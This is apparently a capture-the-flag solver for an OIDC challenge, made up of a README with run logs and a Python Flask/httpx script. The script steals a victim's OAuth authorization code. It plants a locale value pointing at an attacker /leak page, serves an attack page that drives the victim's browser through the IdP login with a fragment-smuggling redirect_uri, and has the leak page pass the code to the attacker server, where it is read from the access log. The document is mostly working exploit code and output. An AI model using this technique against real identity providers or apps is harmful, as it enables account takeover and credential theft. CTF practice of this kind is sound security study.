OIDC転生おじさん solver

Solution

  1. Start the solver server
$ uv run main.py
login: <Response [200 OK]>
register: <Response [302 Found]>
callback: <Response [302 Found]> <Cookies[<Cookie ojimemo_session=eyJzdWIiOiJlYmUzNjMyMi0wMDY0LTQ4N2QtOTYzNC1iZDg0NmEwYWZkYjkiLCJlbWFpbCI6IjY1MTEzMDg5QHBveW9wb3lvLnBveW9wb3lvIn0%3D.xa5dC8HTYUd%2Bh%2Fv8raNvqitawg88ARed9GAamRksrPw for ojimemo.127-0-0-1.nip.io />]>
change locale: <Response [302 Found]>
callback: <Response [302 Found]> 30abbc22393de40899c141bb8670791b2c6776f9d43406fa504e3739fc02b894
report this URL: http://host.docker.internal:3000/attack
 * Serving Flask app 'main'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:3000
Press CTRL+C to quit
  2. Report http://host.docker.internal:3000/attack (the URL printed by the server)
127.0.0.1 - - [11/Apr/2025 15:54:32] "GET /attack HTTP/1.1" 200 -
127.0.0.1 - - [11/Apr/2025 15:54:32] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [11/Apr/2025 15:54:32] "GET /leak?/ HTTP/1.1" 200 -
127.0.0.1 - - [11/Apr/2025 15:54:32] "GET /?token= HTTP/1.1" 404 -
127.0.0.1 - - [11/Apr/2025 15:54:33] "GET /leak?/callback HTTP/1.1" 200 -
127.0.0.1 - - [11/Apr/2025 15:54:33] "GET /?token=?code=2760b611134ce5a52aa3d1b7bec76698365864e140e4ce3245843a6fcbb0ac7f HTTP/1.1" 404 -
  3. Open the callback URL with the leaked code to get the flag IERAE{dummy}
http://ojimemo.127-0-0-1.nip.io:36000/callback?code=2760b611134ce5a52aa3d1b7bec76698365864e140e4ce3245843a6fcbb0ac7f
import httpx
import flask
import random
# Authorization code for the attacker's own IdP session.  Empty until main()
# fills it in; attack() reads it at request time when building its page.
ATTACKER_CODE = ""

# Challenge hosts: the relying party (memo app) and the OpenID provider.
APP_HOST = "http://ojimemo.127-0-0-1.nip.io:36000"
IDP_HOST = "http://ojiid.127-0-0-1.nip.io:36001"

# Where the challenge side reaches this solver.  host.docker.internal
# resolves to the Docker host from inside a container.  Scheme-less on
# purpose: "http://" is prepended where a full URL is printed.
SERVER_HOST = "host.docker.internal:3000"
ATTACK_URL = SERVER_HOST + "/attack"
LEAK_URL = SERVER_HOST + "/leak"
# Flask application serving /attack and /leak; main() starts it last,
# after the attacker-side session state has been prepared.
app = flask.Flask(import_name=__name__)
@app.route('/attack')
def attack():
    """Serve the page that the reported URL points at.

    The returned script opens the attacker's own ``/en/callback?code=…`` URL
    (built from APP_HOST and ATTACKER_CODE at request time) in a new window,
    then one second later navigates that window to the IdP login endpoint
    with ``redirect_uri`` set to the app callback followed by ``%23``
    (``#``).  Nothing is escaped: the constants are trusted and ATTACKER_CODE
    is taken from an IdP ``Location`` header by main().

    NOTE(review): a ``#`` appended to ``redirect_uri`` can only matter if the
    IdP compares redirect URIs loosely (prefix or normalised match); the
    standard defence on the IdP side is exact string comparison against the
    registered value.  The IdP's check itself is not visible in this file.
    """
    return f"""
<script>
const url1 = `{APP_HOST}/en/callback?code={ATTACKER_CODE}` // copied URL
const url2 = `{IDP_HOST}/login?client_id=ojimemo&redirect_uri={APP_HOST}%2Fcallback%23&state=&scope=openid+email+profile&response_type=code&nonce=15c167d69abd630d954b30b9c09d55db`
win = window.open(url1)
setTimeout(() => {{
win.location = url2
}}, 1000)
</script>
"""
@app.route('/leak')
def leak():
    """Serve a page that copies the URL fragment into the query string.

    Browsers never send the fragment to the server, so the inline script
    reads ``location.hash`` (minus the leading ``#``) client-side and
    redirects to ``/?token=<fragment>``.  This app has no ``/`` route, so that
    request 404s, but its path and query land in the Flask access log, which
    is where the value is read (a line like ``GET /?token=?code=…``).
    """
    return """
<script>
location = `/?token=${location.hash.slice(1)}`
</script>
"""
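def _register_throwaway_account():
    """Create a disposable account at the IdP and log it into the app.

    Returns a ``(idp_cookies, memo_cookies)`` pair: the cookies set by the
    registration response and the cookies set by the app callback response.
    Raises ``KeyError`` if the registration response has no ``Location``
    header (the script expects a redirect there).
    """
    # Eight random digits for both values.  ``random`` is acceptable here:
    # the account is throw-away and the values are never used as a secret.
    email = f"{random.randint(10000000, 99999999)}@poyopoyo.poyopoyo"
    password = str(random.randint(10000000, 99999999))

    # Move to the login page, following the redirect chain; the cookies on
    # the final response are forwarded to the registration request.
    res = httpx.get(f'{APP_HOST}/login', follow_redirects=True)
    print("login:", res)

    # Register the user at the IdP.  No redirect following: the 302 is
    # inspected by hand below.
    res = httpx.post(
        f'{IDP_HOST}/login',
        data={'email': email, 'password': password},
        cookies=res.cookies,
    )
    idp_cookies = res.cookies
    print("register:", res)

    # Follow the registration redirect; the app callback answers with the
    # app session cookie.
    res = httpx.get(res.headers['Location'])
    memo_cookies = res.cookies
    print("callback:", res, memo_cookies)
    return idp_cookies, memo_cookies


def _set_locale_to_leak(memo_cookies):
    """Store a locale value pointing at LEAK_URL in the attacker's app session.

    The value is ``'/' + LEAK_URL + '?'``, exactly as in the original script;
    how the app interprets it is not visible in this file.
    """
    res = httpx.post(
        f'{APP_HOST}/en/locale',
        data={'lang': '/' + LEAK_URL + '?'},
        cookies=memo_cookies,
    )
    # Print *this* response.  The original discarded the POST result and
    # printed the earlier callback response under this label.
    print("change locale:", res)


def _fetch_attacker_code(idp_cookies):
    """Walk the login redirect chain once more and return the new code.

    With the IdP session cookies attached no credentials are needed; the
    IdP's final redirect back to the app carries ``code=<value>`` in its
    ``Location`` header.  Raises ``KeyError`` if a hop does not redirect and
    ``IndexError`` if the final Location has no ``code=``.
    """
    res = httpx.get(f'{APP_HOST}/login')
    res = httpx.get(res.headers['Location'], cookies=idp_cookies)  # /auth
    # This hop's Location is expected to be relative, hence the prefix.
    res = httpx.get(IDP_HOST + res.headers['Location'], cookies=idp_cookies)  # /login
    # Take the value following 'code=' (same extraction as the original).
    code = res.headers['Location'].split('code=')[1]
    print("callback:", res, code)
    return code


def main():
    """Set up the attacker's OIDC state, then serve the attack pages.

    Order matters: the locale change needs the app session obtained at
    registration, and the code needs the IdP session.  Stores the code in
    the module global ATTACKER_CODE (read by attack()) and finally starts
    the Flask server; this call does not return until the server stops.
    """
    global ATTACKER_CODE
    idp_cookies, memo_cookies = _register_throwaway_account()
    _set_locale_to_leak(memo_cookies)
    ATTACKER_CODE = _fetch_attacker_code(idp_cookies)
    print("report this URL:", "http://" + ATTACK_URL)
    # Listen on all interfaces so the reported host.docker.internal:3000
    # URL is reachable from outside this machine's loopback.
    app.run(port=3000, host='0.0.0.0')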
# Run the solver only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
# Project metadata for the solver; `uv run main.py` resolves these dependencies.
[project]
name = "solution"
version = "0.1.0"
description = "Add your description here"
readme = "README.md"
requires-python = ">=3.13"
dependencies = [
    "flask>=3.1.0",
    "httpx>=0.28.1",
]